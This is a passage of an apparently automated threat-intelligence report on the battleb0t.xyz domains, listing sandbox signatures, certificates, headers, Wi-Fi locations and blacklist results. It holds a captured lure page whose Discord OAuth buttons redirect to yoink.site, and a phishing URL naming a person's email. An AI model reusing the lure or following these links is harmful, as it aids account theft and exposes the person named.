[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\6a1e5492-4008-43f5-94ff-1f30706f466e.tmp]- [targetUID: 00000000-00007644]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\7644_944314722\\shopping_fre.html]- [targetUID: 00000000-00007644]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00004528]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007644]\n "f34135bd94e6cca1_0" has type "data"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7644_1291673391\\Filtering Rules-AA]- [targetUID: 00000000-00007644]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007644]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.json]- [targetUID: 00000000-00007644]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00007644]\n "72efc0b5-8895-4c58-ba16-c7f0a9a5987d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\72efc0b5-8895-4c58-ba16-c7f0a9a5987d.tmp]- [targetUID: 00000000-00007644]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://llink.to/"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "Math.PI/180"\n Pattern match: "https://llink.to"\n Heuristic match: "llink.to"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuristic match: "geoiptool.com"\n Heuristic match: "getmyip.co.uk"\n Heuristic match: "getmyip.org"\n Heuristic match: "icanhazip.com"\n Heuristic match: "ifconfig.me"\n Heuristic match: "ip-addr.es"\n Heuristic match: "ip-address.domaintools.com"\n Heuristic match: "ip-api.com"\n Heuristic match: "ip-score.com"\n Heuristic match: "ip.jsontest.com"\n Heuristic match: "ip.xss.ru"\n Heuristic match: "ip4.telize.com"\n Heuristic match: "ipchicken.com"\n Heuristic match: "ipecho.net"\n Heuristic match: "ipinfo.info"\n Heuristic match: "ipinfo.io"\n Heuristic match: "ipleak.net"\n Heuristic match: "ipligence.com"\n Heuristic match: "knowmyip.com"\n Heuristic match: "maxmind.com"\n Heuristic match: "meineipadresse.de"\n Heuristic match: "myexternalip.com"\n Heuristic match: "myip.dnsomatic.com"\n Heuristic match: "myip.ht"\n Heuristic match: "myip.nl"\n Heuristic match: "myip.opendns.com"\n Heuristic match: "myipaddress.com"\n Heuristic match: "queryip.net"\n Heuristic match: "showmyip.com"\n Heuristic match: "showmyipaddress.com"\n Heuristic match: "tracemyip.org"\n Heuristic match: "whatismyip.akamai.com"\n Heuristic match: "whatismyip.ca"\n Heuristic match: "whatismyip.com"\n Heuristic match: "whatismyip.everdot.org"\n Heuristic match: "whatismyipaddress.com"\n Heuristic match: "whatsmyip.net"\n Heuristic match: "whatsmyip.org"\n Heuristic match: "whatsmyipaddress.org"\n Heuristic match: "whatsmypublicip.com"\n Heuristic match: "wtfismyip.com"\n Heuristic match: "hispeed.ch"\n Heuristic match: "link.to"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "3.0.0.4" found in string ""version": "3 | 185.199.109.153 |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://use.fontawesome.com/9dfc16ed6b.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 02:49:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
33:08:c1:7e:b3:24:8e:6e:4d:f7:51:42:26:15:9a:55:38:a0:
00:54:bb:bf:aa:57:22:d3:f8:51:d0:9b:b6:f7:48:0e:01:fc:
20:eb:f8:09:fe:e5:12:c5:27:1a:bc:14:2c:c8:47:50:c4:fe:
3b:82:e2:94:1e:ea:46:71:f7:de:cb:93:8d:d3:d6:0e:2f:57:
cf:7c:ae:9d:b7:80:a0:8c:70:81:89:7b:49:c0:84:74:4f:69:
72:bc:41:cd:36:95:5b:ed:7b:a9:03:f4:8f:4c:84:5d:66:e9:
62:45:a8:88:57:2d:42:3b:84:55:29:dc:10:ee:9a:ff:95:59:
7c:96:dc:e9:0f:e7:15:2b:2e:77:02:54:6b:c0:2f:7c:2a:2b:
db:82:1c:6f:b4:a2:5b:f7:1a:91:dc:f4:e2:0e:55:aa:62:5d:
ea:10:a0:10:94:4c:43:5d:24:37:b8:7d:e2:3c:f4:71:74:02:
76:90:40:10:c2:a1:be:28:fb:60:72:80:4c:c5:16:2d:8f:d6:
56:41:19:5e:15:ac:ce:da:7c:e0:18:25:f8:1f:66:f3:f8:f8:
6e:35:dd:10:1a:29:03:23:f7:24:0b:53:2d:1f:94:96:bc:7f:
53:53:c0:38:4a:f1:89:9a:26:af:b7:ac:c3:a2:4f:e2:bf:5c:
17:23:7a:07
| battleb0t.xyz |
| 2023-05-12 03:11:16 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | London, England, W1B, United States, North America | 2a06:98c1:3120::1 |
| 2023-05-12 03:11:42 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | panel.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:76:6D:60) | 50.1188, 8.6843 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ad40179b8e20f-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.155): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:50:16 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.108.153]
https://www.virustotal.com/en/ip-address/185.199.108.153/information/ | 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pannet-24 (Net ID: 00:01:8E:DA:59:C4) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 218 5 (Net ID: 00:01:9F:34:7C:1C) | 34.0544, -118.244 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sprint Drive (Net ID: 00:0A:F5:F9:D9:E8) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DaltonInt (Net ID: 00:0A:04:99:14:E2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:4A:D6:05) | 52.3759, 4.8975 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.107): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | Express | 87.248.157.102 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | redwood (Net ID: 00:01:38:85:C1:F8) | 37.780462,-122.390564 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-tikaro.github.io]
https://www.openphish.com/feed.txt | 0-tikaro.github.io |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 4 | 0 | None | GitHub.com | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Germany | tjdev.de |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 104.196.16.0/20 |
| 2023-05-12 02:45:29 | Physical Location | No | ipapi.co | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 104.196.30.220 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c594d129a872998-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.4): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.185): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 03:10:22 | Blacklisted IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.96.1 | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jbnowires (Net ID: 00:0C:41:B5:31:DD) | 39.0469, -77.4903 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:8443 | 104.21.71.14 |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 72 | 0 | 1 | 0 | None | 188.114.97.1 | ayhu.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 14061 | 64.226.80.0/20 |
| 2023-05-12 02:47:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 20, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fcdfa.ca.gov%2Ferika.lewis%40cdfa.ca.gov', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32" at base ca950000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base c98b0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\IMM32.DLL" at base cd050000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base c98b0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base c7b80000\n "msedge.exe" loaded module "COMBASE.DLL" at base ccbb0000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base cad70000\n "msedge.exe" loaded module "SHELL32.DLL" at base cb680000\n "msedge.exe" loaded module "USER32.DLL" at base ccec0000\n "msedge.exe" loaded module "NTDLL.DLL" at base cd1f0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a00ce01000040c7a2c9fc7f0000@ntdll.dll"\n "22002300ce01000018c7a2c9fc7f0000@ntdll.dll"\n "19001a00a204000040c7a2c9fc7f0000@ntdll.dll"\n "22002300a204000018c7a2c9fc7f0000@ntdll.dll"\n "19001a00dbad000040c7a2c9fc7f0000@ntdll.dll"\n "22002300dbad000018c7a2c9fc7f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7376:120:WilError_01"\n "Local\\SM0:4708:304:WilStaging_02"\n "Local\\SM0:4708:120:WilError_01"\n "SM0:4708:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:7376:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:7376:304:WilStaging_02"\n "Local\\SM0:7376:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7376:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7376:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7376:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.43.150:443"\n "185.88.152.184:443"\n "35.186.254.174:443"\n "104.18.10.207:443"\n "142.251.46.228:443"\n "172.67.71.45:443"\n "142.251.32.35:443"\n "142.250.191.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', 